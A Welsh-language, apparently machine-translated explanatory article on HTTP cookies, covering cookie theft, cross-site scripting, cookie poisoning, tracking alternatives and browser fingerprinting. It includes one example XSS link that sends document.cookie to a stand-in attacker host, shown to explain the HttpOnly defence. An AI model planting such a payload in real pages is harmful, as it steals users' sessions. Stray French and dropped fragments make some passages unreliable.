Ond yn ymarferol mae'r datganiad hwn yn troi allan i fod yn wallgof yn y mwyafrif o achosion oherwydd heddiw mae cyfrifiadur "personol" (neu ffôn clyfar, neu dabled, sy'n waeth) yn cael ei ddefnyddio'n bennaf gan un unigolyn. Mae hyn yn gyfystyr â thargedu person penodol a trwy faint o wybodaeth a gesglir cyrraedd targedau personol hyd yn oed os nad yw'r person yn cael ei adnabod “sef”.

Dwyn cwcis

Gall cyfrifiadur arall ar y rhwydwaith ddwyn cwci.

Yn ystod gweithrediad arferol, mae cwcis yn cael eu hanfon yn ôl rhwng y gweinydd (neu grŵp o weinyddion yn yr un parth) a porwr cyfrifiadur y defnyddiwr. Gan y gall cwcis gynnwys gwybodaeth sensitif (enw defnyddiwr, cyfrinair a ddefnyddir ar gyfer dilysu, ac ati), ni ddylai eu gwerthoedd fod yn hygyrch i gyfrifiaduron eraill. Mae lladrad cwci yn weithred o ryng-gipio cwcis gan drydydd parti anawdurdodedig.

Gellir dwyn cwcis trwy synhwyro pecyn mewn ymosodiad a elwir yn herwgipio sesiwn. Gall cyfrifiaduron heblaw'r rhai sy'n anfon a derbyn (yn enwedig yn y gofod Wi-Fi cyhoeddus heb ei amgryptio) ryng-gipio a darllen traffig ar y rhwyd. Mae'r traffig hwn yn cynnwys cwcis a anfonir dros sesiynau gan ddefnyddio'r protocol HTTP plaen. Pan nad yw traffig rhwydwaith wedi'i amgryptio, gall defnyddwyr maleisus felly ddarllen cyfathrebiadau defnyddwyr eraill ar y rhwydwaith gan ddefnyddio "sniffers pecyn".

Gellir goresgyn y broblem hon trwy amgryptio'r cysylltiad rhwng cyfrifiadur y defnyddiwr a'r gweinydd gan ddefnyddio'r protocol HTTPS. Gall gweinydd nodi a baner ddiogel wrth osod cwci; bydd y porwr ond yn ei anfon dros linell ddiogel, fel cysylltiad SSL.

Fodd bynnag, mae llawer o wefannau, er eu bod yn defnyddio cyfathrebiadau wedi’u hamgryptio HTTPS ar gyfer dilysu defnyddwyr (h.y. y dudalen mewngofnodi), yn ddiweddarach yn anfon cwcis sesiwn a data arall yn ôl yr arfer, trwy gysylltiadau HTTP heb eu hamgryptio am resymau effeithlonrwydd. Felly gall ymosodwyr ryng-gipio cwcis defnyddwyr eraill a'u dynwared ar wefannau priodol neu eu defnyddio mewn ymosodiadau cwci.

Sgriptio yn y wefan: mae cwci na ddylid ond ei gyfnewid rhwng y gweinydd a'r cleient yn cael ei anfon at drydydd parti arall.

Ffordd arall o ddwyn cwcis yw sgriptio gwefannau a chael y porwr ei hun i anfon cwcis at weinyddion maleisus nad ydynt byth yn eu derbyn. Mae porwyr modern yn caniatáu gweithredu rhannau o god y gofynnir amdanynt o'r gweinydd. Os ceir mynediad i gwcis yn ystod amser rhedeg, mae'n bosibl y bydd eu gwerthoedd yn cael eu cyfleu mewn rhyw ffurf i weinyddion na ddylai gael mynediad atynt. Nid yw amgryptio cwcis cyn iddynt gael eu hanfon dros y rhwydwaith yn helpu i atal yr ymosodiad.

Mae'r math hwn o sgriptio ar y safle fel arfer yn cael ei gyflogi gan ymosodwyr ar wefannau sy'n caniatáu i ddefnyddwyr bostio cynnwys HTML. Trwy integreiddio rhan o god cydnaws yn y cyfraniad HTML, gall ymosodwr dderbyn cwcis gan ddefnyddwyr eraill. Gellir defnyddio gwybodaeth am y cwcis hyn trwy gysylltu â'r un safle gan ddefnyddio'r cwcis sydd wedi'u dwyn, a thrwy hynny gael eu cydnabod fel y defnyddiwr y cafodd ei gwcis eu dwyn.

Un ffordd o atal ymosodiadau o'r fath yw defnyddio baner HttpOnly; mae'n opsiwn, a gyflwynwyd ers fersiwn 6 o Internet Explorer yn PHP ers fersiwn 5.2.0 sydd wedi'i gynllunio i wneud y cwci yn anhygyrch i'r cleient yn agos at y sgript. Fodd bynnag, dylai datblygwyr gwe gymryd hyn i ystyriaeth wrth ddatblygu eu gwefan fel eu bod yn imiwn i sgriptio yn y wefan.

Bygythiad diogelwch arall a ddefnyddir yw gwneuthuriad galw ar y safle.

Mae'r fanyleb dechnegol swyddogol yn caniatáu i gwcis gael eu hanfon yn ôl i weinyddion yn y parth y maent yn tarddu ohono yn unig. Fodd bynnag, gellir anfon gwerth cwcis at weinyddion eraill gan ddefnyddio dulliau heblaw penawdau cwci.

Yn benodol, yn gyffredinol, caniateir i ieithoedd sgriptio fel JavaScript gael mynediad at werthoedd cwci ac maent yn gallu anfon gwerthoedd mympwyol i unrhyw weinydd ar y Rhyngrwyd. Defnyddir y gallu sgriptio hwn o wefannau sy'n galluogi defnyddwyr i bostio cynnwys HTML i ddefnyddwyr eraill ei weld.

Er enghraifft, gallai ymosodwr sy'n gweithredu ar y parth example.com bostio sylw sy'n cynnwys y ddolen ganlynol yn pwyntio at flog poblogaidd nad yw fel arall yn ei reoli:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Pan fydd defnyddiwr arall yn clicio ar y ddolen hon, mae'r porwr yn gweithredu'r rhan priodoledd onclick o'r cod, felly mae'n disodli'r llinyn document.cookie gyda'r rhestr o gwcis defnyddwyr sy'n weithredol ar gyfer y dudalen hon. Felly, anfonir y rhestr hon o gwcis i'r gweinydd example.com, ac felly mae'r ymosodwr yn gallu casglu cwcis y defnyddiwr hwn.

Mae'r math hwn o ymosodiad yn anodd ei ganfod ar ochr y defnyddiwr oherwydd bod y sgript yn dod o'r un parth a osododd y cwci, ac mae'n ymddangos bod y gweithrediad i anfon y gwerthoedd wedi'i awdurdodi gan y parth hwnnw. Ystyrir mai cyfrifoldeb y gweinyddwyr sy’n gweithredu’r math hwn o safle yw rhoi cyfyngiadau mewn lle sy’n atal cyhoeddi cod maleisus.

Nid yw cwcis yn weladwy yn uniongyrchol i raglenni ochr cleientiaid fel JavaScript os cawsant eu hanfon gyda baner HttpOnly. O safbwynt y gweinydd, yr unig wahaniaeth yw bod maes newydd yn cael ei ychwanegu yn llinell y pennawd Set-Cookie sy'n cynnwys y llinyn HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Pan fydd y porwr yn derbyn cwci o'r fath, mae i fod i'w ddefnyddio fel arfer yn y cyfnewid HTTP canlynol, ond heb ei wneud yn weladwy i sgriptiau a weithredir ar ochr y cleient. Nid yw baner HttpOnly yn rhan o unrhyw fanyleb dechnegol swyddogol, ac nid yw'n cael ei gweithredu ym mhob porwr. Sylwch nad oes unrhyw ffordd ar hyn o bryd i atal darllen ac ysgrifennu cwcis sesiwn trwy'r dull XMLHTTPRequest.

Addasu cynnwys: mae ymosodwr yn anfon cwci annilys i weinydd, o bosibl wedi'i wneud o gwci dilys a anfonwyd gan y gweinydd.

Newid cwcis

Cyn gynted ag y bydd angen storio'r cwcis a'u dychwelyd heb eu newid i'r gweinydd, gall ymosodwr addasu gwerth y cwcis cyn eu hanfon yn ôl at y gweinydd. Er enghraifft, os yw cwci yn cynnwys cyfanswm y gwerth y mae'n rhaid i'r defnyddiwr ei dalu am yr eitemau a roddir yng nghert siopa'r siop, mae newid y gwerth hwn yn gwneud y gweinydd yn agored i'r risg o godi tâl ar yr ymosodwr yn llai na'r pris cychwyn. Gelwir y broses o addasu gwerth cwcis gwenwyn cwci a gellir ei ddefnyddio ar ôl dwyn cwci i wneud yr ymosodiad yn barhaus.

Yn y dull diystyru cwci, mae'r ymosodwr yn manteisio ar nam porwr i anfon cwci annilys i'r gweinydd.

Fodd bynnag, nid yw'r rhan fwyaf o wefannau ond yn storio ID sesiwn - rhif unigryw a gynhyrchir ar hap a ddefnyddir i adnabod defnyddiwr y sesiwn - yn y cwci ei hun, tra bod yr holl wybodaeth arall yn cael ei storio ar y gweinydd. Yn yr achos hwn, mae'r broblem hon yn cael ei datrys i raddau helaeth.

Trin cwcis rhwng gwefannau

Disgwylir i bob safle gael ei gwcis ei hun, felly ni ddylai un safle allu addasu neu greu cwcis sy'n gysylltiedig â gwefan arall. Gall diffyg diogelwch porwr gwe ganiatáu i wefannau maleisus dorri'r rheol hon. Cyfeirir yn gyffredin at ymelwa o'r fath ddiffyg coginio ar draws y safle. Efallai mai pwrpas ymosodiadau o'r fath fydd dwyn ID sesiwn.

Dylai defnyddwyr ddefnyddio'r fersiynau diweddaraf o borwyr gwe lle mae'r gwendidau hyn bron yn cael eu dileu.

Cyflwr sy'n gwrthdaro rhwng y cleient a'r gweinydd

Gall defnyddio cwcis greu gwrth-ddweud rhwng cyflwr y cleient a'r cyflwr sydd wedi'i storio yn y cwci. Os yw'r defnyddiwr yn caffael cwci ac yn clicio ar fotwm "Yn ôl" y porwr, yn gyffredinol nid yw cyflwr y porwr yr un peth â chyn y caffaeliad hwn. Er enghraifft, os yw basged siop ar-lein yn cael ei chreu gan ddefnyddio cwcis, ni all cynnwys y fasged newid pan fydd y defnyddiwr yn dychwelyd i hanes y porwr: os yw'r defnyddiwr yn pwyso botwm i ychwanegu erthygl yn ei fasged ac yn clicio ar y "Dychwelyd " botwm, mae'r erthygl yn aros yn yr un hon. Efallai nad dyma yw bwriad y defnyddiwr, sydd yn sicr am ganslo ychwanegu'r erthygl. Gall hyn arwain at annibynadwyedd, dryswch a chwilod. Felly dylai datblygwyr gwe fod yn ymwybodol o'r broblem hon a gweithredu mesurau i drin sefyllfaoedd fel hyn.

Cwci yn dod i ben

Mae cwcis parhaus wedi cael eu beirniadu gan arbenigwyr diogelwch preifatrwydd am beidio â chael eu gosod i ddod i ben yn ddigon buan, gan ganiatáu i wefannau olrhain defnyddwyr ac adeiladu eu proffil dros amser. Mae'r agwedd hon ar gwcis hefyd yn rhan o'r broblem herwgipio sesiwn, oherwydd gellir defnyddio cwci parhaus sydd wedi'i ddwyn i ddynwared defnyddiwr am gyfnod sylweddol o amser.

I ddarllen hefyd: GAFAM: pwy ydyn nhw? Pam maen nhw (weithiau) mor frawychus?

Dewisiadau eraill yn lle cwcis

Gellir cyflawni rhai gweithrediadau y gellir eu cyflawni gan ddefnyddio cwcis hefyd gan ddefnyddio mecanweithiau eraill sy'n osgoi cwcis neu'n ail-greu cwcis wedi'u dileu, sy'n creu materion preifatrwydd yn yr un ffordd (neu weithiau'n waeth oherwydd anweledig bryd hynny) na chwcis.

Cyfeiriad IP

Gellir olrhain defnyddwyr gyda chyfeiriad IP y cyfrifiadur sy'n galw'r dudalen. Mae'r dechneg hon wedi bod ar gael ers cyflwyno'r We Fyd Eang, wrth i dudalennau gael eu llwytho i lawr mae'r gweinydd yn gofyn am gyfeiriad IP y cyfrifiadur sy'n rhedeg y porwr neu'r dirprwy, os na chaiff ei ddefnyddio. Gall y gweinydd olrhain y wybodaeth hon p'un a oes cwcis yn cael eu defnyddio ai peidio. Fodd bynnag, mae'r cyfeiriadau hyn fel arfer yn llai dibynadwy wrth adnabod defnyddiwr na chwcis oherwydd gall cyfrifiaduron a dirprwyon gael eu rhannu gan ddefnyddwyr lluosog, a gall yr un cyfrifiadur dderbyn cyfeiriad IP gwahanol ar bob sesiwn waith (fel c yn aml yn achos cysylltiadau ffôn) .

Gall olrhain yn ôl cyfeiriadau IP fod yn ddibynadwy mewn rhai sefyllfaoedd, megis cysylltiadau band eang sy'n cynnal yr un cyfeiriad IP am amser hir, cyn belled â bod pŵer ymlaen.

Mae rhai systemau fel Tor wedi'u cynllunio i gynnal anhysbysrwydd y Rhyngrwyd a gwneud olrhain trwy gyfeiriad IP yn amhosibl neu'n anymarferol.

URL

Mae techneg fwy manwl gywir yn seiliedig ar fewnosod gwybodaeth mewn URLs. Mae rhan llinyn ymholiad yr URL yn un dechneg a ddefnyddir yn nodweddiadol at y diben hwn, ond gellir defnyddio rhannau eraill hefyd. Mae'r gweinyddwr Java a'r mecanweithiau sesiwn PHP yn defnyddio'r dull hwn os nad yw cwcis wedi'u galluogi.

Mae'r dull hwn yn golygu bod y gweinydd gwe yn atodi ceisiadau llinynnol i ddolenni'r dudalen we sy'n ei gludo pan gaiff ei anfon i'r porwr. Pan fydd y defnyddiwr yn dilyn dolen, mae'r porwr yn dychwelyd y llinyn ymholiad atodedig i'r gweinydd.

Mae llinynnau ymholiad a ddefnyddir at y diben hwn a chwcis yn debyg iawn, yn wybodaeth a ddewiswyd yn fympwyol gan y gweinydd a'i dychwelyd gan y porwr. Fodd bynnag, mae rhai gwahaniaethau: pan fydd URL sy'n cynnwys llinyn ymholiad yn cael ei ailddefnyddio, anfonir yr un wybodaeth at y gweinydd. Er enghraifft, os yw dewisiadau defnyddiwr wedi'u hamgodio mewn llinyn ymholiad o URL a bod y defnyddiwr yn anfon yr URL hwnnw at ddefnyddiwr arall trwy e-bost, bydd y defnyddiwr hwnnw hefyd yn gallu defnyddio'r dewisiadau hynny.

Ar y llaw arall, pan fydd defnyddiwr yn cyrchu'r un dudalen ddwywaith, nid oes unrhyw sicrwydd y bydd yr un llinyn ymholiad yn cael ei ddefnyddio'r ddau dro. Er enghraifft, os yw defnyddiwr yn glanio ar dudalen o dudalen safle mewnol y tro cyntaf ac yn glanio ar yr un dudalen o dudalen allanol yr eildro, mae llinyn yr ymholiad o'i gymharu â thudalen y wefan fel arfer yn wahanol, tra bod y cwcis yr un peth .

Mae anfanteision eraill llinynnau ymholiad yn gysylltiedig â diogelwch: mae cadw data sy'n nodi sesiwn mewn llinynnau ymholiad yn galluogi neu'n symleiddio ymosodiadau gosod sesiwn, ymosodiadau cyfeirio dynodwr, a gorchestion eraill. Mae pasio IDau sesiwn fel cwcis HTTP yn fwy diogel.

Maes ffurf cudd

Un math o olrhain sesiwn, a ddefnyddir gan ASP.NET, yw defnyddio ffurflenni gwe gyda meysydd cudd. Mae'r dechneg hon yn debyg iawn i ddefnyddio llinynnau ymholiad URL i gario gwybodaeth ac mae ganddi'r un manteision ac anfanteision; ac os yw'r ffurflen yn cael ei phrosesu gyda'r dull HTTP GET, mae'r meysydd mewn gwirionedd yn dod yn rhan o URL y porwr a fydd yn ei anfon wrth gyflwyno'r ffurflen. Ond mae'r rhan fwyaf o ffurflenni'n cael eu prosesu gyda HTTP POST, sy'n achosi i'r wybodaeth ffurflen, gan gynnwys meysydd cudd, gael ei hychwanegu fel mewnbwn ychwanegol nad yw'n rhan o'r URL nac yn gwci.

Mae gan y dull hwn ddwy fantais o safbwynt olrhain: yn gyntaf, bydd olrhain y wybodaeth a roddir yn y cod ffynhonnell HTML a mewnbwn POST yn hytrach na'r URL yn caniatáu i'r defnyddiwr cyffredin osgoi'r olrhain hwn; yn ail, nid yw gwybodaeth y sesiwn yn cael ei chopïo pan fydd y defnyddiwr yn copïo'r URL (i gadw'r dudalen ar ddisg neu ei hanfon trwy e-bost, er enghraifft).

ffenestr.enw

Gall pob porwr gwe cyffredin storio swm eithaf mawr o ddata (2MB i 32MB) trwy JavaScript gan ddefnyddio eiddo window.name y DOM. Gellir defnyddio'r data hwn yn lle cwcis sesiwn ac fe'i defnyddir hefyd ar draws parthau. Gellir cyplysu'r dechneg â gwrthrychau JSON i storio set gymhleth o newidynnau sesiwn ochr y cleient.

Yr anfantais yw y bydd gan bob ffenestr neu dab ar wahân ffenestr wag i ddechrau; wrth bori trwy dabiau (a agorwyd gan y defnyddiwr) mae hyn yn golygu na fydd gan y tabiau a agorir yn unigol enw ffenestr. Yn ogystal, gellir defnyddio window.name i olrhain ymwelwyr ar draws gwahanol wefannau a all achosi problem preifatrwydd.

Mewn rhai ffyrdd gall hyn fod yn fwy diogel na chwcis, oherwydd nad yw'r gweinydd yn ymwneud â hi, gan olygu ei fod yn agored i ymosodiad rhwydwaith o gwcis synhwyro. Fodd bynnag, os cymerir mesurau arbennig i ddiogelu'r data, mae'n agored i ymosodiadau pellach, gan fod y data ar gael trwy wefannau eraill a agorwyd yn yr un ffenestr.

Dilysu HTTP

Mae'r protocol HTTP yn cynnwys y protocolau dilysu mynediad sylfaenol a'r crynhoad dilysu mynediad, sy'n caniatáu mynediad i dudalen we dim ond pan fydd y defnyddiwr wedi rhoi'r enw defnyddiwr a'r cyfrinair pas iawn. Os yw'r gweinydd yn gofyn am dystysgrif i ganiatáu mynediad i dudalen we, mae'r porwr yn gofyn amdani gan y defnyddiwr ac ar ôl ei chael, mae'r porwr yn ei storio a'i hanfon ym mhob cais HTTP dilynol. Gellir defnyddio'r wybodaeth hon i olrhain y defnyddiwr.

Gwrthrych a rennir yn lleol

Os yw porwr yn cynnwys yr ategyn Adobe Flash Player, bydd y gwrthrychau lleol a rennir gellir ei ddefnyddio at yr un diben â chwcis. Gallant fod yn ddewis deniadol i ddatblygwyr gwe oherwydd:

• y terfyn maint rhagosodedig ar gyfer gwrthrych a rennir lleol yw 100 KB;
• mae gwiriadau diogelwch ar wahân i wiriadau cwcis defnyddwyr (felly gellir caniatáu gwrthrychau lleol a rennir pan nad yw cwcis).

Y pwynt olaf hwn, sy'n gwahaniaethu'r polisi rheoli cwcis o'r rhai o wrthrychau lleol a rennir Adobe yn codi cwestiynau ynghylch rheolaeth ei osodiadau preifatrwydd gan y defnyddiwr: rhaid iddo fod yn ymwybodol nad yw ei reolaeth o gwcis yn cael unrhyw effaith ar reoli gwrthrychau lleol a rennir, ac i'r gwrthwyneb.

Beirniadaeth arall o'r system hon yw mai dim ond trwy ategyn Adobe Flash Player sy'n berchnogol ac nid yn safon gwe y gellir ei ddefnyddio.

Dyfalbarhad ochr y cleient

Mae rhai porwyr gwe yn cefnogi mecanwaith dyfalbarhad seiliedig ar sgript, sy'n caniatáu i'r dudalen storio gwybodaeth yn lleol i'w defnyddio'n ddiweddarach. Mae Internet Explorer, er enghraifft, yn cefnogi gwybodaeth barhaus yn hanes porwr, nodau tudalen, mewn fformat sydd wedi'i storio yn XML, neu'n uniongyrchol gyda thudalen we wedi'i chadw ar ddisg. Ar gyfer Microsoft Internet Explorer 5, mae dull data defnyddiwr ar gael trwy ymddygiadau DHTML.

Cyflwynodd y W3C yn HTML 5 API JavaScript newydd ar gyfer storio data ochr cleientiaid o'r enw Web storage a'i nod oedd disodli cwcis yn barhaol. Mae'n debyg i gwcis ond gyda gallu llawer gwell a heb storio gwybodaeth ym mhennyn ceisiadau HTTP. Mae'r API yn caniatáu dau fath o storfa we: storfa leol a storfa sesiynau, tebyg i gwcis parhaus a chwcis sesiwn (ac eithrio bod cwcis sesiwn yn dod i ben pan fydd y porwr ar gau tra storfa sesiynau dod i ben pan fydd y tab ar gau), yn y drefn honno. Cefnogir storio gwe gan Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 ac Opera 10.50.

Mae mecanwaith gwahanol fel arfer yn dibynnu ar caching porwr (yn y cof yn hytrach nag adnewyddu) gan ddefnyddio rhaglenni JavaScript mewn tudalennau gwe. 

Er enghraifft, gall tudalen gynnwys y tag . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

Ar y pwynt hwn, mae'r rhaglen yn aros yng nghof y storfa ac nid yw'r dudalen yr ymwelwyd â hi yn cael ei hail-lwytho eilwaith. O ganlyniad, os yw'r rhaglen yn cynnwys newidyn byd-eang (er enghraifft var id = 3243242;), mae'r dynodwr hwn yn parhau'n ddilys a gellir ei ddefnyddio gan god JavaScript arall unwaith y bydd y dudalen wedi'i llwytho eto, neu unwaith y bydd tudalen sy'n cysylltu'r rhaglen wedi'i llwytho. 

Anfantais fawr y dull hwn yw bod yn rhaid i'r newidyn byd-eang JavaScript fod yn statig, sy'n golygu na ellir ei newid na'i ddileu fel cwci.

olion bysedd porwr gwe

Mae olion bysedd porwr yn wybodaeth a gesglir am osodiadau ffurfweddu porwr at ddibenion adnabod. Gellir defnyddio'r olion bysedd hyn i adnabod defnyddiwr Rhyngrwyd neu ddyfais yn llawn neu'n rhannol hyd yn oed pan fydd cwcis wedi'u hanalluogi.

Mae gwybodaeth ffurfweddu porwr gwe sylfaenol wedi'i chasglu ers amser maith gan wasanaethau cynulleidfa gwefan er mwyn mesur traffig gwe dynol yn gywir a chanfod gwahanol fathau o dwyll clic. Gyda chymorth ieithoedd sgriptio ochr y cleient, mae casglu gwybodaeth yn llawer mwy cywir bellach yn bosibl.

Mae trosi'r wybodaeth hon yn llinyn did yn cynhyrchu ôl bys dyfais. Yn 2010, mesurodd y Electronic Frontier Foundation (EFF) entropi olion bysedd porwr i fod o leiaf Darnau 18,1, ac roedd hynny cyn i ddatblygiadau mewn olion bysedd cynfas ychwanegu 5,7 did at yr entropi hwnnw.

Cwcis yn gryno

Ffeiliau testun bach yw cwcis sy’n cael eu storio gan y porwr gwe ar yriant caled ymwelydd gwefan ac sy’n cael eu defnyddio (ymhlith pethau eraill) i gofnodi gwybodaeth am yr ymwelydd neu ei daith drwy’r wefan. Gall y gwefeistr felly adnabod arferion ymwelydd a phersonoli cyflwyniad ei wefan ar gyfer pob ymwelydd; mae cwcis wedyn yn ei gwneud hi'n bosibl cofio faint o erthyglau i'w harddangos ar y dudalen gartref neu hyd yn oed gadw'r manylion mewngofnodi ar gyfer unrhyw barti preifat: pan fydd yr ymwelydd yn dychwelyd i'r wefan, nid oes angen iddo deipio ei enw a'i gyfrinair mwyach cael eu cydnabod, gan eu bod yn cael eu darllen yn awtomatig yn y cwci.

Mae gan gwci oes gyfyngedig, a osodir gan ddylunydd y wefan. Gallant hefyd ddod i ben ar ddiwedd y sesiwn ar y wefan, sy'n cyfateb i gau'r porwr. Defnyddir cwcis yn eang i wneud bywyd yn haws i ymwelwyr a chyflwyno gwybodaeth fwy perthnasol iddynt. Ond mae technegau arbennig yn ei gwneud hi'n bosibl dilyn ymwelydd ar sawl safle ac felly i gasglu a chroeswirio gwybodaeth helaeth iawn am ei arferion. Mae'r dull hwn wedi rhoi enw da i'r defnydd o gwcis fel techneg gwyliadwriaeth sy'n torri preifatrwydd ymwelwyr, sy'n anffodus yn cyfateb i realiti mewn llawer o achosion o ddefnydd am resymau nad ydynt yn dechnegol neu nad ydynt yn parchu disgwyliadau defnyddwyr.

Mewn ymateb i'r ofnau cyfreithlon hyn, mae HTML 5 yn cyflwyno API JavaScript newydd ar gyfer storio data ochr cleientiaid o'r enw Web storage, sy'n llawer mwy diogel a chyda mwy o gapasiti, sy'n ceisio disodli cwcis.

Storio cwcis

Gyda rhai porwyr, mae'n hawdd golygu cwci, mae golygydd testun syml fel Notepad yn ddigon i newid ei werthoedd â llaw.

Mae cwcis yn cael eu cadw'n wahanol yn dibynnu ar y porwr:

• Microsoft Internet Explorer yn arbed pob cwci mewn ffeil wahanol;
• Mozilla Firefox yn arbed ei holl gwcis mewn un ffeil;
• Opera yn arbed ei holl gwcis mewn un ffeil ac yn eu hamgryptio (amhosib eu haddasu ac eithrio yn yr opsiynau meddalwedd);
• Afal Safari yn arbed ei holl gwcis mewn un ffeil estyniad .plist. Addasu yn bosibl ond nid yn hawdd iawn, oni bai eich bod yn mynd drwy'r opsiynau meddalwedd.

Mae angen porwyr i gefnogi minima :

• 300 o gwcis ar yr un pryd;
• 4 o y cwci;
• 20 cwci fesul gwesteiwr neu barth.